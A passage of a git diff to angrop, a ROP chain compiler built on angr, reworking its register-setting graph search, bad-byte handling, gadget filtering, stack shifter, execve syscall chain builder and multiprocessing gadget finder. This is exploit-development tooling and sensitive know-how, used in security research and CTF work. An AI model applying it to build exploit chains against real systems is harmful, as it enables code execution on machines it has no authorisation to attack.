self._get_sufficient_partial_controllers(registers) - - # filter reg setting gadgets - allow_mem_access = modifiable_memory_range is not None - gadgets = self._find_relevant_gadgets(allow_mem_access=allow_mem_access, **registers) - for s in partial_controllers.values(): - gadgets.update(s) - gadgets = list(gadgets) - l.debug("finding best gadgets") 
- - # lets try doing a graph search to set registers, something like dijkstra's for minimum length - - # each key is tuple of sorted registers - # use tuple (prev, total_stack_change, gadget, partial_controls) - data = {} - - to_process = [] - to_process.append((0, ())) - visited = set() - data[()] = (None, 0, None, set()) - best_stack_change = 0xffffffff - best_reg_tuple = None - while to_process: - regs = heapq.heappop(to_process)[1] - - if regs in visited: + if not all_chains: continue - visited.add(regs) - if data[regs][1] >= best_stack_change: + def chain_sc(gadgets): + sc = 0 + for g in gadgets: + sc += g.stack_change + return sc + unique_chains = [] + max_bits = max(all_chains.keys()) + if not self._can_set_reg_with_bits(dst, max_bits): + unique_chains = sorted(all_chains[max_bits], key=chain_sc)[:5] + shorter_chains = [] + if dst in shortest: + for bits in all_chains: + shorter_chains += sorted(all_chains[bits], key=chain_sc)[:5] + shorter_chains = sorted(shorter_chains, key=chain_sc)[:5] + shorter_chains = [c for c in shorter_chains if chain_sc(c) < shortest[dst]] + + # take the first normalized unique_chain + for c in unique_chains: + try: + gadgets = self._expand_ropblocks(c) + c = self._build_reg_setting_chain(gadgets, {}) + c = RopBlock.from_chain(c) + rop_blocks.append(c) + break + except RopException: + pass + + # take the first normalized shorter_chain + for c in shorter_chains: + try: + gadgets = self._expand_ropblocks(c) + c = self._build_reg_setting_chain(gadgets, {}) + c = RopBlock.from_chain(c) + if dst not in shortest or c.stack_change < shortest[dst]: + shortest[dst] = c.stack_change + rop_blocks.append(c) + break + except RopException: + pass + return rop_blocks + + def _optimize_with_gadgets(self): + new_blocks = set() + shortest = {x:y[0] for x,y in self._reg_setting_dict.items() if y} + arch_bytes = self.project.arch.bytes + for gadget in itertools.chain(self._reg_setting_gadgets, self.chain_builder._reg_mover._reg_moving_gadgets): + if 
gadget.self_contained and not gadget.has_symbolic_access(): continue - if max_stack_change is not None and data[regs][1] > max_stack_change: + # check whether it introduces new capabilities + rb = None + new_pops = {x for x in gadget.popped_regs if not self._reg_setting_dict[x]} + new_moves = {x for x in gadget.reg_moves if not self._reg_setting_dict[x.to_reg] and \ + self._reg_setting_dict[x.from_reg]} + if new_pops or new_moves: + if new_moves: + for new_move in new_moves: + rb = self._normalize_for_move(gadget, new_move) + if rb is None: + continue + if new_move.to_reg in rb.popped_regs: + new_blocks.add(rb) + reg = new_move.to_reg + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + else: + l.warning("normalizing \n%s does not yield any wanted new reg setting capability: %s", + rb.dstr(), + new_move.to_reg) + else: + rb = self.normalize_gadget(gadget, post_preserve=new_pops) + if rb is None: + continue + if rb.popped_regs.intersection(new_pops): + new_blocks.add(rb) + for reg in new_pops: + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + else: + l.warning("normalizing \n%s does not yield any wanted new reg setting capability: %s", + rb.dstr(), + new_pops) + continue + + # this means we tried to normalize the gadget but failed, + # so don't try to do it again + if any(reg not in shortest for reg in gadget.popped_regs): continue - for g in gadgets: - # ignore gadgets which don't have a positive stack change - if g.stack_change <= 0: + # check whether it shortens any chains + better = False + for reg in gadget.popped_regs: + # it is unlikely we can use one more gadget to normalize it + # usually it takes two (pop; ret), so account for it by - arch_ bytes + if reg not in shortest or gadget.stack_change < shortest[reg].stack_change - arch_bytes: + # normalizing jmp_mem gadgets use a ton of gadgets, no need to even try + if gadget.transit_type == 'jmp_mem': + continue + if 
gadget.transit_type == 'pop_pc': + better = True + break + if gadget.transit_type == 'jmp_reg': + if gadget.pc_reg not in shortest: + continue + tmp = shortest[gadget.pc_reg] + if gadget.stack_change + tmp.stack_change < shortest[reg].stack_change: + better = True + break + if better: + if rb is None: + rb = self.normalize_gadget(gadget) + if not rb: continue + for reg in rb.popped_regs: + if reg not in shortest or rb.stack_change < shortest[reg].stack_change: + shortest[reg] = rb + new_blocks.add(rb) + return new_blocks - # ignore gadgets that set any of our preserved registers - if g.changed_regs.intersection(preserve_regs): - continue + def optimize(self, processes): + # TODO: make it multiprocessing - stack_change = data[regs][1] - new_stack_change = stack_change + g.stack_change - # if its longer than the best ignore - if new_stack_change >= best_stack_change: - continue - # ignore if we only change controlled regs - start_regs = set(regs) - if g.changed_regs.issubset(start_regs - data[regs][3]): - continue + # now we have a functional RegSetter, check whether we can do better + res = False - end_regs, partial_regs = self._get_updated_controlled_regs(g, regs, data[regs], partial_controllers, - modifiable_memory_range) + # first, see whether we can use reg_mover to set registers + rop_blocks = self._optimize_with_reg_moves() + self._insert_to_reg_dict(rop_blocks) + res |= bool(rop_blocks) - # ignore the gadget if does not provide us new controlled registers - end_reg_tuple = tuple(sorted(end_regs)) - npartial = len(partial_regs) - if len(end_regs - start_regs) == 0: - continue + # second, see whether we can use non-self-contained gadgets to set registers + new_blocks = self._optimize_with_gadgets() + self._insert_to_reg_dict(new_blocks) + res |= bool(new_blocks) - # if we havent seen that tuple before, or payload is shorter or less partially controlled regs. 
- if end_reg_tuple in data: # we have seen the tuple before - end_data = data.get(end_reg_tuple, None) - # payload is longer or contains more partially controlled regs - if not (new_stack_change < end_data[1] and npartial <= len(end_data[3])): - continue - if npartial >= len(end_data[3]): - continue + return res - # now make sure the chain does provide what it claims to provide - chain = self._tuple_to_gadgets(data, regs) + [g] - if not self._verify_chain(chain, end_regs): - continue + #### The Graph Search Algorithm #### + def _reduce_graph(self, graph, regs): # pylint: disable=no-self-use + """ + TODO: maybe make the reduction smarter instead of just 5 gadgets each edge + """ + regs = set(regs) + def giga_graph_gadget_compare(g1, g2): + if g1.stack_change < g2.stack_change: + return -1 + if g1.stack_change > g2.stack_change: + return 1 + side_effect1 = len(g1.changed_regs - regs) + side_effect2 = len(g2.changed_regs - regs) + if side_effect1 < side_effect2: + return -1 + if side_effect1 > side_effect2: + return 1 + return 0 + + for edge in graph.edges: + objects = graph.get_edge_data(*edge)['objects'] + objects = sorted(objects, key=cmp_to_key(giga_graph_gadget_compare))[:5] + graph.get_edge_data(*edge)['objects'] = objects + + def find_candidate_chains_giga_graph_search(self, + modifiable_memory_range, + registers, + preserve_regs, + warn) -> list[list[RopGadget|RopBlock]]: + if preserve_regs is None: + preserve_regs = set() + else: + preserve_regs = preserve_regs.copy() - # it improves the graph so add it - data[end_reg_tuple] = (regs, new_stack_change, g, partial_regs) - heapq.heappush(to_process, (new_stack_change, end_reg_tuple)) + registers = registers.copy() - # update the result if we find a better chain - if search_regs.issubset(end_regs) and new_stack_change < best_stack_change: - best_stack_change = new_stack_change - best_reg_tuple = end_reg_tuple + # handle hard registers + gadgets = 
self._find_relevant_gadgets(allow_mem_access=modifiable_memory_range is not None, **registers) + hard_chain = self._handle_hard_regs(gadgets, registers, preserve_regs) + if not registers: + return [hard_chain] - # if the best_reg_tuple is None then we failed to set the desired registers :( - if best_reg_tuple is None: - return None, None, data + # now do the giga graph search + regs = sorted(list(registers.keys())) + # build the target pops + bit_map = {} + for reg, val in registers.items(): + if self.project.arch.bits == 32 or val.symbolic: + bits = self.project.arch.bits + else: + if (val.concreted >> 32) == 0: + bits = 32 + else: + bits = 64 + bit_map[reg] = bits + + graph = nx.DiGraph() + + # add all the nodes. here, each node represents a state where the corresponding register + # is correctly set to the target value + nodes = list(itertools.product((True, False), repeat=len(regs))) + graph.add_nodes_from(nodes) + + def add_edge(src, dst, obj): + assert type(obj) is not list + if graph.has_edge(src, dst): + objects = graph.get_edge_data(src, dst)['objects'] + if obj in objects: + return + objects.add(obj) + else: + graph.add_edge(src, dst, objects={obj}) - gadgets = self._tuple_to_gadgets(data, best_reg_tuple) - return gadgets, best_stack_change, data + def get_dst_node(src, reg_list, clobbered_regs): + dst = list(src) + for reg in reg_list: + if reg not in regs: + continue + idx = regs.index(reg) + dst[idx] = True + for reg in clobbered_regs: + if reg not in regs: + continue + idx = regs.index(reg) + dst[idx] = False + return tuple(dst) + + def can_set_regs(g): + # ofc pops + reg_set = set(pop.reg for pop in g.reg_pops if pop.reg not in bit_map or pop.bits >= bit_map[pop.reg]) + # if concrete values happen to match + for reg in regs: + if registers[reg].symbolic: + continue + if reg in g.concrete_regs and g.concrete_regs[reg] == registers[reg].concreted: + reg_set.add(reg) + return reg_set - def _get_sufficient_partial_controllers(self, registers): - 
sufficient_partial_controllers = defaultdict(set) - for g in self._reg_setting_gadgets: - for reg in g.changed_regs: - if reg in registers: - if self._check_if_sufficient_partial_control(g, reg, registers[reg]): - sufficient_partial_controllers[reg].add(g) - return sufficient_partial_controllers + # add edges for pops and concrete values + total_reg_set = set() + for g in gadgets: + if isinstance(g, RopGadget) and not g.self_contained: + continue + reg_set = can_set_regs(g) + for unique_reg_set in list(itertools.product(*g.pop_equal_set)): + unique_reg_set = set(unique_reg_set) + unique_reg_set = unique_reg_set.intersection(reg_set) + clobbered_regs = g.changed_regs - unique_reg_set + # don't add the edge if changes registers that we want to preserve + if g.changed_regs.intersection(preserve_regs): + continue + total_reg_set.update(unique_reg_set) + for n in nodes: + src_node = n + dst_node = get_dst_node(n, unique_reg_set, clobbered_regs) + if src_node == dst_node: + continue + # greedy algorithm: only add edges that transit to an at least equally good node + src_cnt = len([x for x in src_node if x is True]) + dst_cnt = len([x for x in dst_node if x is True]) + if dst_cnt >= src_cnt: + add_edge(src_node, dst_node, g) + + # bad, we can't set all registers, no need to try + to_set_reg_set = set(registers.keys()) + if to_set_reg_set - total_reg_set: + if warn: + l.warning("fail to cover all registers using giga_graph_search!") + l.warning("register covered: %s, registers to set: %s", total_reg_set, to_set_reg_set) + return [] - @staticmethod - def _get_updated_controlled_regs(gadget, regs, data_tuple, partial_controllers, modifiable_memory_range=None): - g = gadget - start_regs = set(regs) - partial_regs = data_tuple[3] - usable_regs = start_regs - partial_regs - end_regs = set(start_regs) - - # skip ones that change memory if no modifiable_memory_addr - if modifiable_memory_range is None and g.has_symbolic_access(): - return set(), set() - elif 
modifiable_memory_range is not None: - # check if we control all the memory reads/writes/changes - accesses = g.mem_changes + g.mem_reads + g.mem_writes - all_mem_accesses = [m for m in accesses if m.is_symbolic_access()] - mem_accesses_controlled = True - for m_access in all_mem_accesses: - for reg in m_access.addr_dependencies: - if reg not in usable_regs: - mem_accesses_controlled = False - usable_regs -= m_access.addr_dependencies - if not mem_accesses_controlled: - return set(), set() - - # analyze all registers that we control - for reg in g.changed_regs: - end_regs.discard(reg) - partial_regs.discard(reg) - - # for any reg that can be fully controlled check if we control its dependencies - for reg in g.reg_controllers.keys(): - has_deps = True - for dep in g.reg_dependencies[reg]: - if dep not in usable_regs: - has_deps = False - if has_deps: - for dep in g.reg_dependencies[reg]: - end_regs.discard(dep) - usable_regs.discard(dep) - end_regs.add(reg) - else: - end_regs.discard(reg) - - # for all the changed regs that we dont fully control, we see if the partial control is good enough - for reg in set(g.changed_regs) - set(g.reg_controllers.keys()): - if reg in partial_controllers and g in partial_controllers[reg]: - # partial control is good enough so now check if we control all the dependencies - if reg not in g.reg_dependencies or set(g.reg_dependencies[reg]).issubset(usable_regs): - # we control all the dependencies add it and remove them from the usable regs - partial_regs.add(reg) - end_regs.add(reg) - if reg in g.reg_dependencies: - usable_regs -= set(g.reg_dependencies[reg]) - end_regs -= set(g.reg_dependencies[reg]) - - for reg in g.popped_regs: - end_regs.add(reg) - - return end_regs, partial_regs - - def _check_if_sufficient_partial_control(self, gadget, reg, value): - # doesnt change it - if reg not in gadget.changed_regs: - return False - # can be controlled completely, not a partial control - if reg in gadget.reg_controllers or reg in 
gadget.popped_regs: - return False - # make sure the register doesnt depend on itself - if reg in gadget.reg_dependencies and reg in gadget.reg_dependencies[reg]: - return False + self._reduce_graph(graph, regs) - # set the register - state = rop_utils.make_symbolic_state(self.project, self.arch.reg_set) - state.registers.store(reg, 0) - state.regs.ip = gadget.addr - # store A's past the end of the stack - state.memory.store(state.regs.sp + gadget.stack_change, claripy.BVV(b"A"*0x100)) + # TODO: the ability to set a register using concrete_values and then move it to another + # currently, we don't have a testcase that needs this - succ = rop_utils.step_to_unconstrained_successor(project=self.project, state=state) - # successor - if succ.ip is succ.registers.load(reg): - return False + # now find all paths between the src and dst node + src = tuple([False] * len(regs)) + dst = tuple([True] * len(regs)) - if succ.solver.solution(succ.registers.load(reg), value): - # make sure wasnt a symbolic read - for var in succ.registers.load(reg).variables: - if "symbolic_read" in var: - return False - return True - return False + chains = [] # here, each "chain" is a list of gadgets + try: + paths = nx.all_simple_paths(graph, source=src, target=dst, cutoff=min(len(registers)+2, 6)) + for path in paths: + if hard_chain: + tmp = [[x] for x in hard_chain] + else: + tmp = [] + edges = zip(path, path[1:]) + for edge in edges: + objects = graph.get_edge_data(edge[0], edge[1])['objects'] + tmp.append(objects) + # for each path, take the shortest 5 chains + path_chains = itertools.product(*tmp) + path_chains = sorted(path_chains, key=lambda c: sum(g.stack_change for g in c))[:5] + chains += path_chains + chains = list(chains) + except nx.exception.NetworkXNoPath: # type: ignore + return [] - #### Chain Building Algorithm 2: pop-only BFS search #### + # then sort them by stack_change + chains = sorted(chains, key=lambda c: sum(g.stack_change for g in c)) + return chains def 
_find_relevant_gadgets(self, allow_mem_access=True, **registers): """ @@ -472,15 +549,18 @@ def _find_relevant_gadgets(self, allow_mem_access=True, **registers): gadgets = set() # this step will add crafted rop_blocks as well + # notice that this step only include rop_blocks that can + # POP the register for reg in registers: gadgets.update(self._reg_setting_dict[reg]) + # add all other gadgets that may be relevant, + # including gadgets that set concrete values for g in self._reg_setting_gadgets: - if not g.self_contained: - continue - if g.has_symbolic_access(): + if not allow_mem_access and g.has_symbolic_access(): continue - if not allow_mem_access and g.num_sym_mem_access: + # TODO: normalize these, use badbyte test as the testcase + if g.oop: continue for reg in registers: if reg in g.popped_regs: @@ -493,53 +573,47 @@ def _find_relevant_gadgets(self, allow_mem_access=True, **registers): gadgets.add(g) return gadgets - @staticmethod - def _find_concrete_chains(gadgets, registers): - chains = [] - for g in gadgets: - for reg, val in registers.items(): - if reg in g.concrete_regs and g.concrete_regs[reg] == val: - chains.append([g]) - return chains - - def find_candidate_chains_pop_only_bfs_search(self, gadgets, preserve_regs, **registers): - """ - 1. find gadgets that set concrete values to the target values, such as xor eax, eax to set eax to 0 - 2. find all pop only chains by BFS search - TODO: handle moves - """ - # get the list of regs that cannot be popped (call it hard_regs) + def _handle_hard_regs(self, gadgets, registers, preserve_regs) -> list[RopGadget|RopBlock]: # pylint: disable=unused-argument + # handle register set that contains bad byte (so it can't be popped) + # and cannot be directly set using concrete values hard_regs = [reg for reg, val in registers.items() if self._word_contain_badbyte(val)] if len(hard_regs) > 1: l.error("too many registers contain bad bytes! bail out! 
%s", registers) + raise RopException("too many registers contain bad bytes") + if not hard_regs: + return [] + if registers[hard_regs[0]].symbolic: return [] # if hard_regs exists, try to use concrete values to craft the value hard_chain = [] - if hard_regs and not registers[hard_regs[0]].symbolic: - reg = hard_regs[0] - val = registers[reg].concreted - key = (reg, val) - if key in self.hard_chain_cache: - hard_chain = self.hard_chain_cache[key] + reg = hard_regs[0] + val = registers[reg].concreted + key = (reg, val) + if key in self.hard_chain_cache: + hard_chain = self.hard_chain_cache[key] + else: + hard_chains = self._find_concrete_chains(gadgets, {reg: val}) + if hard_chains: + hard_chain = hard_chains[0] else: - hard_chains = self._find_concrete_chains(gadgets, {reg: val}) - if hard_chains: - hard_chain = hard_chains[0] - else: - hard_chain = self._find_add_chain(gadgets, reg, val) - if hard_chain: - self.hard_chain_cache[key] = hard_chain # we cache the result even if it fails - if not hard_chain: - l.error("Fail to set register: %s to: %#x", reg, val) - return [] - registers.pop(reg) - - preserve_regs.update(hard_regs) - # use the original pop techniques to set other registers - chains = self._recursively_find_chains(gadgets, hard_chain, preserve_regs, - set(registers.keys()), preserve_regs) - return self._sort_chains(chains) + hard_chain = self._find_add_chain(gadgets, reg, val) + if hard_chain: + self.hard_chain_cache[key] = hard_chain # we cache the result even if it fails + if not hard_chain: + l.error("Fail to set register: %s to: %#x", reg, val) + raise RopException("Fail to set hard registers") + registers.pop(reg) + return hard_chain + + @staticmethod + def _find_concrete_chains(gadgets, registers): + chains = [] + for g in gadgets: + for reg, val in registers.items(): + if reg in g.concrete_regs and g.concrete_regs[reg] == val: + chains.append([g]) + return chains def _find_add_chain(self, gadgets, reg, val): """ @@ -552,8 +626,7 @@ def 
_find_add_chain(self, gadgets, reg, val): for g1 in concrete_setter_gadgets: for g2 in delta_gadgets: try: - chain = self._build_reg_setting_chain([g1, g2], False, # pylint:disable=too-many-function-args - {reg: val}, g1.stack_change+g2.stack_change) + chain = self._build_reg_setting_chain([g1, g2], {reg: val}) state = chain.exec() bv = state.registers.load(reg) if bv.symbolic: @@ -564,187 +637,23 @@ def _find_add_chain(self, gadgets, reg, val): pass return None - def _recursively_find_chains(self, gadgets, chain, preserve_regs, todo_regs, hard_preserve_regs): - """ - preserve_regs: soft preservation, can be overwritten as long as it gets back to control - hard_preserve_regs: cannot touch these regs at all - """ - if not todo_regs: - return [chain] - - todo_list = [] - for g in gadgets: - set_regs = g.popped_regs.intersection(todo_regs) - if not set_regs: - continue - if g.changed_regs.intersection(hard_preserve_regs): - continue - clobbered_regs = g.changed_regs.intersection(preserve_regs) - if clobbered_regs - set_regs: - continue - new_preserve = preserve_regs.copy() - new_preserve.update(set_regs) - new_chain = chain.copy() - new_chain.append(g) - todo_list.append((new_chain, new_preserve, todo_regs-set_regs, hard_preserve_regs)) - - res = [] - for todo in todo_list: - res += self._recursively_find_chains(gadgets, *todo) - return res - - #### Chain Building Algorithm 3: RiscyROP's backwards search #### - - def find_candidate_chains_backwards_recursive_search( - self, - gadgets: Iterable[RopGadget], - registers: set[str], - current_chain: list[RopGadget], - preserve_regs: set[str], - modifiable_memory_range: tuple[int, int] | None, - visited: dict[tuple[str, ...], int], - max_length: int, - ) -> Iterator[list[RopGadget]]: - """Recursively build ROP chains starting from the end using the RiscyROP algorithm.""" - # Base case. 
- if not registers: - yield current_chain[::-1] - return - - if len(current_chain) >= max_length: - return - - # Stop if we've seen the same set of registers before to prevent infinite recursion. - reg_tuple = tuple(sorted(registers)) - if visited.get(reg_tuple, max_length) <= len(current_chain): - return - visited[reg_tuple] = len(current_chain) - - potential_next_gadgets = [] - - for gadget in gadgets: - if not gadget.changed_regs.isdisjoint(preserve_regs): - continue - # Skip gadgets with non-constant memory accesses if we don't have memory that can be safely accessed. - if modifiable_memory_range is None and gadget.has_symbolic_access(): - continue - remaining_regs = self._get_remaining_regs(gadget, registers) - if remaining_regs is None: - continue - potential_next_gadgets.append((gadget, remaining_regs)) - - # Sort gadgets by number of remaining registers, stack change, and instruction count - potential_next_gadgets.sort( - key=lambda g: ( - sum(self._reg_weights[reg] for reg in g[1]), - g[0].stack_change, - g[0].isn_count, - ) - ) - - for gadget, remaining_regs in potential_next_gadgets: - current_chain.append(gadget) - yield from self.find_candidate_chains_backwards_recursive_search( - gadgets, - remaining_regs, - current_chain, - preserve_regs, - modifiable_memory_range, - visited, - max_length, - ) - current_chain.pop() - - def _get_remaining_regs(self, gadget: RopGadget, registers: set[str]) -> set[str] | None: - """ - Get the registers that still need to be controlled after prepending a gadget. - - Returns None if this gadget cannot be used. - """ - # Check if the gadget sets any registers that we need. 
- if gadget.popped_regs.isdisjoint(registers) and not any( - reg_move.to_reg in registers and reg_move.bits == self.project.arch.bits - for reg_move in gadget.reg_moves - ): - return None - - remaining_regs = set() - stack_dependencies = set() - - for reg in registers: - if reg in gadget.popped_regs: - reg_vars = gadget.popped_reg_vars[reg] if reg in gadget.popped_reg_vars else set() - if not reg_vars.isdisjoint(stack_dependencies): - # Two registers are popped from the same location on the stack. - return None - stack_dependencies |= reg_vars - continue - new_reg = reg - for reg_move in gadget.reg_moves: - if reg_move.to_reg == reg: - if reg_move.bits != self.project.arch.bits: - # Register is only partially overwritten. - return None - new_reg = reg_move.from_reg - break - else: - # Check if the gadget changes the register in some other way. - if reg in gadget.changed_regs: - return None - if new_reg in remaining_regs: - # Conflict, can't put two different values in the same register. 
- return None - remaining_regs.add(new_reg) - - if gadget.transit_type == 'jmp_reg': - if gadget.pc_reg in remaining_regs: - return None - remaining_regs.add(gadget.pc_reg) - - if not gadget.constraint_regs.isdisjoint(remaining_regs): - return None - remaining_regs |= gadget.constraint_regs - - return remaining_regs - #### Gadget Filtering #### - def _filter_gadgets(self, gadgets): - """ - group gadgets by features and drop lesser groups - """ - # gadget grouping - d = defaultdict(list) - for g in gadgets: - key = (len(g.changed_regs), g.stack_change, g.num_sym_mem_access, g.isn_count) - d[key].append(g) - if len(d) == 0: - return set() - if len(d) == 1: - return {gadgets.pop()} - - # only keep the best groups - keys = set(d.keys()) - bests = set() - while keys: - k1 = keys.pop() - # check if nothing is better than k1 - for k2 in bests|keys: - # if k2 is better than k1 - if all(k2[i] <= k1[i] for i in range(4)): - break - else: - bests.add(k1) - - # turn groups back to gadgets - gadgets = set() - for key, val in d.items(): - if key not in bests: - continue - gadgets = gadgets.union(val) - return gadgets - - def _same_effect(self, g1, g2): + def _effect_tuple(self, g): + v1 = tuple(sorted(g.popped_regs)) + v2 = tuple(sorted(g.concrete_regs.items())) + v3 = [] + for x,y in g.reg_dependencies.items(): + v3.append((x, tuple(sorted(y)))) + v3 = tuple(sorted(v3)) + v4 = g.transit_type + return (v1, v2, v3, v4) + + def _comparison_tuple(self, g): + return (len(g.changed_regs-g.popped_regs), g.stack_change, g.num_sym_mem_access, + g.isn_count, int(g.has_conditional_branch is True)) + + def _same_effect(self, g1, g2): # pylint: disable=no-self-use if g1.popped_regs != g2.popped_regs: return False if g1.concrete_regs != g2.concrete_regs: @@ -753,8 +662,6 @@ def _same_effect(self, g1, g2): return False if g1.transit_type != g2.transit_type: return False - if g1.has_conditional_branch != g2.has_conditional_branch: - return False return True def filter_gadgets(self, gadgets): 
@@ -762,13 +669,37 @@ def filter_gadgets(self, gadgets): process gadgets based on their effects exclude gadgets that do symbolic memory access """ - bests = set() - gadgets = set(gadgets) - while gadgets: - g0 = gadgets.pop() - equal_class = {g for g in gadgets if self._same_effect(g0, g)} - equal_class.add(g0) - bests = bests.union(self._filter_gadgets(equal_class)) - - gadgets -= equal_class - return bests + gadgets = [g for g in gadgets if g.popped_regs or g.concrete_regs] + results = self._filter_gadgets(gadgets) + return results + + #### Main Entrance #### + def run(self, modifiable_memory_range=None, preserve_regs=None, warn=True, **registers): + if len(registers) == 0: + return RopChain(self.project, self, badbytes=self.badbytes) + + # sanity check + preserve_regs = set(preserve_regs) if preserve_regs else set() + unknown_regs = set(registers.keys()).union(preserve_regs) - set(self.arch.reg_list) + if unknown_regs: + raise RopException("unknown registers: %s" % unknown_regs) + + # cast values to RopValue + for x in registers: + registers[x] = rop_utils.cast_rop_value(registers[x], self.project) + + for gadgets in self.find_candidate_chains_giga_graph_search(modifiable_memory_range, + registers, + preserve_regs, + warn): + chain_str = "\n".join(g.dstr() for g in gadgets) + l.debug("building reg_setting chain with chain:\n%s", chain_str) + try: + gadgets = self._expand_ropblocks(gadgets) + chain = self._build_reg_setting_chain(gadgets, registers) + if self.verify(chain, preserve_regs, registers): + return chain + except (RopException, SimUnsatError): + pass + + raise RopException("Couldn't set registers :(") diff --git a/angrop/chain_builder/shifter.py b/angrop/chain_builder/shifter.py index 1ffc7793..7ab0dda9 100644 --- a/angrop/chain_builder/shifter.py +++ b/angrop/chain_builder/shifter.py @@ -1,9 +1,12 @@ import logging from collections import defaultdict +import claripy + from .. 
import rop_utils from .builder import Builder from ..rop_chain import RopChain +from ..rop_block import RopBlock from ..errors import RopException l = logging.getLogger(__name__) @@ -82,11 +85,17 @@ def shift(self, length, preserve_regs=None, next_pc_idx=-1): if g.pc_offset != next_pc_idx*arch_bytes: continue try: - chain = RopChain(self.project, self.chain_builder) + chain = RopBlock(self.project, self) + state = chain._blank_state chain.add_gadget(g) for idx in range(g_cnt): if idx != next_pc_idx: - chain.add_value(self._get_fill_val()) + tmp = claripy.BVS(f"symbolic_stack_{idx}", self.project.arch.bits) + state.memory.store(state.regs.sp+idx*arch_bytes+arch_bytes, tmp) + val = state.memory.load(state.regs.sp+idx*arch_bytes+arch_bytes, + self.project.arch.bytes, + endness=self.project.arch.memory_endness) + chain.add_value(val) else: next_pc_val = rop_utils.cast_rop_value( chain._blank_state.solver.BVS("next_pc", self.project.arch.bits), @@ -120,23 +129,13 @@ def retsled(self, size, preserve_regs=None): raise RopException(f"Failed to create a ret-sled sp for {size:#x} bytes while preserving {preserve_regs}") - def _same_effect(self, g1, g2): - if g1.stack_change != g2.stack_change: - return False - if g1.transit_type != g2.transit_type: - return False - if g1.pc_offset != g2.pc_offset: - return False - return True + def _effect_tuple(self, g): + v1 = g.stack_change + v2 = g.pc_offset + return (v1, v2) - def _better_than(self, g1, g2): - if g1.num_sym_mem_access > g2.num_sym_mem_access: - return False - if not g1.changed_regs.issubset(g2.changed_regs): - return False - if g1.isn_count > g2.isn_count: - return False - return True + def _comparison_tuple(self, g): + return (len(g.changed_regs), g.stack_change, rop_utils.transit_num(g), g.isn_count) def filter_gadgets(self, gadgets): """ diff --git a/angrop/chain_builder/sys_caller.py b/angrop/chain_builder/sys_caller.py index 7667a52b..48b3546c 100644 --- a/angrop/chain_builder/sys_caller.py +++ 
b/angrop/chain_builder/sys_caller.py @@ -56,7 +56,14 @@ def verify(chain, registers, preserve_regs): for reg in preserve_regs: if reg in registers: del registers[reg] - state = chain.sim_exec_til_syscall() + try: + state = chain.sim_exec_til_syscall() + except RuntimeError: + chain_str = chain.dstr() + l.exception("Somehow angrop thinks\n%s\ncan be used for syscall chain generation-1.\nregisters: %s", + chain_str, registers) + return False + if state is None: return False @@ -64,7 +71,7 @@ def verify(chain, registers, preserve_regs): bv = getattr(state.regs, reg) if (val.symbolic != bv.symbolic) or state.solver.eval(bv != val.data): chain_str = chain.dstr() - l.exception("Somehow angrop thinks\n%s\ncan be used for the chain generation-2.\nregisters: %s", + l.exception("Somehow angrop thinks\n%s\ncan be used for syscall chain generation-2.\nregisters: %s", chain_str, registers) return False @@ -86,24 +93,15 @@ def _try_invoke_execve(self, path_addr): ptr = nullptr try: - return self.do_syscall(execve_syscall, [path_addr, ptr, ptr], - use_partial_controllers=False, needs_return=False) - except RopException: - pass - - # Try to use partial controllers - l.warning("Trying to use partial controllers for syscall") - try: - return self.do_syscall(execve_syscall, [path_addr, 0, 0], - use_partial_controllers=True, needs_return=False) + return self.do_syscall(execve_syscall, [path_addr, ptr, ptr], needs_return=False) except RopException: pass raise RopException("Fail to invoke execve!") def execve(self, path=None, path_addr=None): - if "unix" not in self.project.loader.main_object.os.lower(): - raise RopException("unknown unix platform") + if self.project.simos.name != 'Linux': + raise RopException(f"{self.project.simos.name} is not supported!") if not self.syscall_gadgets: raise RopException("target does not contain syscall gadget!") @@ -170,7 +168,7 @@ def set_sysnum(g): def key_func(g): good_sets = set() for reg, val in g.prologue.concrete_regs.items(): - if 
target_regs[reg] == val: + if reg in target_regs and target_regs[reg] == val: good_sets.add(reg) return len(good_sets) gadgets = sorted(gadgets, reverse=True, key=key_func) diff --git a/angrop/gadget_finder/__init__.py b/angrop/gadget_finder/__init__.py index 6a7c0380..e9efed85 100644 --- a/angrop/gadget_finder/__init__.py +++ b/angrop/gadget_finder/__init__.py @@ -1,27 +1,30 @@ +import os import re +import time +import signal import logging -import itertools +import multiprocessing as mp from functools import partial -from multiprocessing import Pool import tqdm +import psutil from angr.errors import SimEngineError, SimMemoryError from angr.misc.loggers import CuteFormatter -from angr.analyses.bindiff import differing_constants -from angr.analyses.bindiff import UnmatchedStatementsException from . import gadget_analyzer from ..arch import get_arch -from ..errors import RopException from ..arch import ARM, X86, AMD64, AARCH64 l = logging.getLogger(__name__) logging.getLogger('pyvex.lifting').setLevel("ERROR") - +ANALYZE_GADGET_TIMEOUT = 3 _global_gadget_analyzer: gadget_analyzer.GadgetAnalyzer = None # type: ignore +_global_skip_cache = None +_global_cache = None +_global_init_rss = None # disable loggers in each worker def _disable_loggers(): @@ -32,15 +35,42 @@ def _disable_loggers(): # global initializer for multiprocessing def _set_global_gadget_analyzer(rop_gadget_analyzer): - global _global_gadget_analyzer # pylint: disable=global-statement + global _global_gadget_analyzer, _global_skip_cache, _global_cache, _global_init_rss # pylint: disable=global-statement _global_gadget_analyzer = rop_gadget_analyzer + _global_skip_cache = set() + _global_cache = {} _disable_loggers() + process = psutil.Process() + _global_init_rss = process.memory_info().rss + +def alarm_handler(signum, frame): # pylint: disable=unused-argument + l.warning("[angrop] worker_func2 times out, exit the worker process!") + os._exit(0) + +def worker_func1(cslice): + analyzer = 
_global_gadget_analyzer + res = list(GadgetFinder._addresses_from_slice(analyzer, cslice, _global_skip_cache, _global_cache, None)) + return (cslice[1]-cslice[0]+1, res) -def run_worker(addr, allow_cond_branch=None): - if allow_cond_branch is None: - res = _global_gadget_analyzer.analyze_gadget(addr) +def worker_func2(addr, cond_br=None): + analyzer = _global_gadget_analyzer + signal.signal(signal.SIGALRM, alarm_handler) + + signal.alarm(ANALYZE_GADGET_TIMEOUT) + if cond_br is None: + res = analyzer.analyze_gadget(addr) else: - res = _global_gadget_analyzer.analyze_gadget(addr, allow_conditional_branches=allow_cond_branch) + res = analyzer.analyze_gadget(addr, allow_conditional_branches=cond_br) + signal.alarm(0) + + if not res: + # HACK: we are seeing some very bad memory leak situation, restart the worker + process = psutil.Process() + rss = process.memory_info().rss + if rss - _global_init_rss > 500*1024*1024: + l.warning("[angrop] worker_func2 encounters memory leak, exit the worker process!") + os._exit(0) + if res is None: return [] if isinstance(res, list): @@ -52,7 +82,8 @@ class 